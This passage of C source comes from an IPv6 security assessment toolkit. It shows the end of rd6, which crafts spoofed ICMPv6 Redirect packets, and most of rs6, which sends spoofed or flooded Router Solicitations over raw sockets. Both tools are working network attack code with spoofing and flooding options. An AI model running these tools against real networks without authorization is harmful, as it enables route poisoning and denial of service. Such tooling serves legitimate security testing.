rhtcp->th_sport= htons(peerport); rhtcp->th_dport= htons(redirport); rhtcp->th_seq = htonl(tcpseq); rhtcp->th_ack= htonl(tcpack); rhtcp->th_flags= tcpflags; rhtcp->th_urp= htons(tcpurg); rhtcp->th_win= htons(tcpwin); rhtcp->th_off= MIN_TCP_HLEN >> 2; rhtcp->th_sum = random(); if(rhbytes <= (MIN_IPV6_HLEN + MIN_TCP_HLEN)){ memcpy(ptr, rhbuff, rhbytes); ptr+= rhbytes; } else{ memcpy(ptr, rhbuff, MIN_IPV6_HLEN+MIN_TCP_HLEN); ptr += MIN_IPV6_HLEN+MIN_TCP_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_TCP_HLEN; while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } } } else if(rhudp_f){ rhipv6->ip6_nxt= IPPROTO_UDP; rhudp = (struct udp_hdr *) (rhbuff + sizeof(struct ip6_hdr)); rhudp->uh_sport= htons(peerport); rhudp->uh_dport= htons(redirport); rhudp->uh_ulen= rhipv6->ip6_plen; rhudp->uh_sum= random(); if(rhbytes <= (MIN_IPV6_HLEN + MIN_UDP_HLEN)){ memcpy(ptr, rhbuff, rhbytes); ptr+= rhbytes; } else{ memcpy(ptr, rhbuff, MIN_IPV6_HLEN+MIN_UDP_HLEN); ptr += MIN_IPV6_HLEN+MIN_UDP_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_UDP_HLEN; while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } } } else if(rhicmp6_f){ rhipv6->ip6_nxt= IPPROTO_ICMPV6; rhicmp6 = (struct icmp6_hdr *) (rhbuff + sizeof(struct ip6_hdr)); rhicmp6->icmp6_type = ICMP6_ECHO_REQUEST; rhicmp6->icmp6_code = 0; rhicmp6->icmp6_cksum = random(); rhicmp6->icmp6_data16[0]= random(); /* Identifier */ rhicmp6->icmp6_data16[1]= random(); /* Sequence Number */ if(rhbytes <= (MIN_IPV6_HLEN + MIN_ICMP6_HLEN)){ memcpy(ptr, rhbuff, rhbytes); ptr+= rhbytes; } else{ memcpy(ptr, rhbuff, MIN_IPV6_HLEN+MIN_ICMP6_HLEN); ptr += MIN_IPV6_HLEN+MIN_ICMP6_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_ICMP6_HLEN; while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } } } } } rd->nd_rd_cksum = 0; rd->nd_rd_cksum = in_chksum(v6buffer, rd, ptr-((unsigned char *)rd), IPPROTO_ICMPV6); if(!idata->fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ targets++; }while(targets\n" "Please send any bug reports to " ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(makeonlink_f) puts("Making nodes on-link (setting the RD Target Address to the RD Destination Address)"); if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(floodr_f) printf("Flooding the target with %u Redirected Addresses\n", nredirs); if(floodt_f) printf("Flooding the target with %u Target Addresses\n", ntargets); if(!floods_f){ if(ether_ntop(&idata->hsrcaddr, plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&idata->hsrcaddr, plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: randomized for each packet"); } /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&idata->hdstaddr, plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (all-nodes multicast)":"")); } if(inet_ntop(AF_INET6, &idata->srcaddr, psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (randomized)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, ((!idata->dstaddr_f)?" (all-nodes link-local multicast)":"")); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; ifragh_f) printf("Sending each packet in fragments of %u bytes (plus the Unfragmentable part)\n", nfrags); if(inet_ntop(AF_INET6, &rediraddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Redirected Address to presentation format"); exit(EXIT_FAILURE); } if(idata->dstaddr_f){ if(!floodr_f){ printf("Redirect Destination Address: %s%s\n", pv6addr, ((!rediraddr_f)?" (randomized)":"")); } else{ printf("Redirect Destination Address: randomized, from the %s/%u prefix%s\n", pv6addr, redirpreflen, \ (!redirprefix_f)?" (default)":""); } } if(inet_ntop(AF_INET6, &targetaddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Redirect Target Address to presentation format"); exit(EXIT_FAILURE); } if(idata->dstaddr_f && targetaddr_f){ if(!floodt_f){ printf("Redirect Target Address: %s%s\n", pv6addr, ((!targetaddr_f)?" (randomized)":"")); } else{ printf("Redirect Target Address: randomized, from the %s/%u prefix%s\n", pv6addr, targetpreflen, \ (!targetprefix_f)?" (default)":""); } } for(i=0;i Address: %s\n", \ ((floods_f && !tllaopta_f)?"(randomized for each packet)":plinkaddr)); } if((rhtcp_f || rhdefault_f) && idata->dstaddr_f){ printf("Payload Type: IPv6/TCP%s\n", (rhdefault_f?" (default)":"")); printf("Source Port: %u%s\tDestination Port: %u%s\n", peerport, (peerport_f?"":" (randomized)"),\ redirport, (redirport_f?"":" (randomized)")); printf("SEQ Number: %u%s\tACK Number: %u%s\n", tcpseq, (tcpseq_f?"":" (randomized)"), \ tcpack, (tcpack_f?"":" (randomized)")); printf("Flags: %s%s%s%s%s%s%s%s\t", ((tcpflags & TH_FIN)?"F":""), ((tcpflags & TH_SYN)?"S":""), \ ((tcpflags & TH_RST)?"R":""), ((tcpflags & TH_PUSH)?"P":""),\ ((tcpflags & TH_ACK)?"A":""), ((tcpflags & TH_URG)?"U":""),\ ((!tcpflags)?"none":""), ((!tcpflags_f)?" (default)":"")); printf("Window: %u%s\tURG Pointer: %u%s\n", tcpwin, (tcpwin_f?"":" (randomized)"), \ tcpurg, (tcpurg_f?"":" (default)")); } if(rhudp_f && idata->dstaddr_f){ puts("Payload Type: IPv6/UDP"); printf("Source Port: %u%s\tDestination Port: %u%s\n", peerport, (peerport_f?"":" (randomized)"),\ redirport, (redirport_f?"":" (randomized)")); } if(rhicmp6_f && idata->dstaddr_f){ puts("Payload Type: IPv6/ICMPv6 Echo Request"); printf("Identifier: %u%s\tSequence Number: %u%s", icmp6id, (icmp6id_f?"":" (randomized)"), \ icmp6seq, (icmp6seq_f?"":" (randomized)")); } } ipv6toolkit-2.0+ds.1/tools/rd6.h000066400000000000000000000000541254360455000164150ustar00rootroot00000000000000/* * Header file for the rd6 tool * */ ipv6toolkit-2.0+ds.1/tools/rs6.c000066400000000000000000000640451254360455000164410ustar00rootroot00000000000000/* * rs6: A security assessment tool for attack vectors based on * ICMPv6 Router Solicitation messages * * Copyright (C) 2009-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make rs6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "rs6.h" #include "libipv6.h" #include "ipv6toolkit.h" void init_packet_data(struct iface_data *); void send_packet(struct iface_data *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); pcap_t *pfd; struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct in6_addr *pkt_ipv6addr; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; char all_nodes_addr[]= ALL_NODES_MULTICAST_ADDR; unsigned char buffer[65556]; unsigned char *v6buffer, *ptr, *startofprefixes; struct ip6_hdr *ipv6, *pkt_ipv6; struct nd_router_solicit *rs; struct ether_header *ethernet, *pkt_ether; struct nd_opt_slla *sllaopt; char *lasts, *endptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, sources, nsources, startrand; uint16_t mask; uint8_t hoplimit; struct ether_addr linkaddr[MAX_SLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; unsigned int nsleep; char *charptr; char plinkaddr[ETHER_ADDR_PLEN], phsrcaddr[ETHER_ADDR_PLEN], phdstaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pprefix[INET6_ADDRSTRLEN]; unsigned char sllopt_f=0, sllopta_f=0, loop_f = 0, sleep_f=0, floods_f=0, hoplimit_f=0; unsigned char newdata_f=0; /* Support for IPv6 extension headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; unsigned char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct iface_data idata; int main(int argc, char **argv){ extern char *optarg; int r; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-address", required_argument, 0, 'S'}, {"link-dst-address", required_argument, 0, 'D'}, {"add-slla-opt", no_argument, 0, 'e'}, {"src-link-opt", required_argument, 0, 'E'}, {"flood-sources", required_argument, 0, 'F'}, {"loop", no_argument, 0, 'l'}, {"sleep", no_argument, 0, 'z'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:eE:F:lz:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in IPv6 Source Address ('-s' option)"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f= 1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ idata.hsrcaddr_f = 1; if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } break; case 'D': /* Destination Ethernet Address */ idata.hdstaddr_f = 1; if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } break; case 'E': /* Source link-layer option */ sllopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } sllopta_f=1; nlinkaddr++; break; case 'e': /* Add Source link-layer option */ sllopt_f = 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f=1; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("rs6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ puts("Must specify the network interface with the -i option"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, (idata.dstaddr_f?LOAD_SRC_NXT_HOP:LOAD_PCAP_ONLY)) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if( pcap_datalink(idata.pfd) != DLT_EN10MB){ printf("Error: Interface %s is not an Ethernet interface\n", idata.iface); exit(EXIT_FAILURE); } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_NOPACKETS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); srandom(time(NULL)); /* If the IPv6 Source Address has not been specified, and the "-F" (flood) option has not been specified, select a random link-local unicast address. */ if(!idata.srcaddr_f && !floods_f){ /* When randomizing a link-local IPv6 address, select addresses that belong to the prefix fe80::/64 (that's what a link-local address looks-like in legitimate cases). The KAME implementation discards addresses in which the second highe-order 16 bits (srcaddr.s6_addr16[1] in our case) are not zero. */ if ( inet_pton(AF_INET6, "fe80::", &(idata.srcaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(idata.srcaddr), &(idata.srcaddr), 64); } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ if ( inet_pton(AF_INET6, "fe80::", &(idata.srcaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(idata.srcaddr), &(idata.srcaddr), 64); idata.srcpreflen=64; } if(!idata.dstaddr_f){ /* Destination Address defaults to all-nodes (ff02::1) */ if( inet_pton(AF_INET6, ALL_ROUTERS_MULTICAST_ADDR, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } } if(!idata.hsrcaddr_f) /* Source link-layer address is randomized by default */ randomize_ether_addr(&(idata.hsrcaddr)); if(!idata.hdstaddr_f) /* Destination link-layer address defaults to all-nodes */ if(ether_pton(ETHER_ALLROUTERS_LINK_ADDR, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } if(sllopt_f && !sllopta_f){ /* The value of the source link-layer address option */ linkaddr[0]= idata.hsrcaddr; /* defaults to the source Ethernet address */ nlinkaddr++; } if(!floods_f) nsources=1; if(!sleep_f) nsleep=1; if( !idata.fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); send_packet(&idata); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f && idata.verbose_f) printf("Now sending Router Solicitations every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (U. part) (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_router_solicit)) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting Router Solicitation header (should be using Frag. option?)"); exit(EXIT_FAILURE); } rs= (struct nd_router_solicit *) (ptr); rs->nd_rs_type = ND_ROUTER_SOLICIT; rs->nd_rs_code = 0; ptr += sizeof(struct nd_router_solicit); /* If a single source link-layer address is specified, it is included in all packets */ if(sllopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_slla)) <= (v6buffer+idata->max_packet_size)){ sllaopt = (struct nd_opt_slla *) ptr; sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, linkaddr[0].a, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); } else{ puts("Packet too large while processing source link-layer addresss opt. (should be using Frag. option?)"); exit(EXIT_FAILURE); } } startofprefixes = ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Router Solicitation Message, and * send the attack apcket(s). */ void send_packet(struct iface_data *idata){ sources=0; do{ if(floods_f){ /* Randomize the IPv6 Source address based on the specified prefix and prefix length (defaults to fe80::/64). */ randomize_ipv6_addr(&(ipv6->ip6_src), &(idata->srcaddr), idata->srcpreflen); if(!idata->hsrcaddr_f){ randomize_ether_addr(&(ethernet->src)); /* If the source-link layer address must be included, but no value was specified we set it to the randomized Ethernet Source Address */ if(sllopt_f && !sllopta_f){ memcpy(sllaopt->address, ethernet->src.a, ETH_ALEN); } } } if(nlinkaddr==1) linkaddrs=1; else linkaddrs=0; do{ newdata_f=0; ptr = startofprefixes; while(linkaddrsmax_packet_size){ sllaopt = (struct nd_opt_slla *) ptr; sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, linkaddr[linkaddrs].a, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); linkaddrs++; newdata_f=1; } rs->nd_rs_cksum = 0; rs->nd_rs_cksum = in_chksum(v6buffer, rs, ptr-((unsigned char *)rs), IPPROTO_ICMPV6); if(!idata->fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); 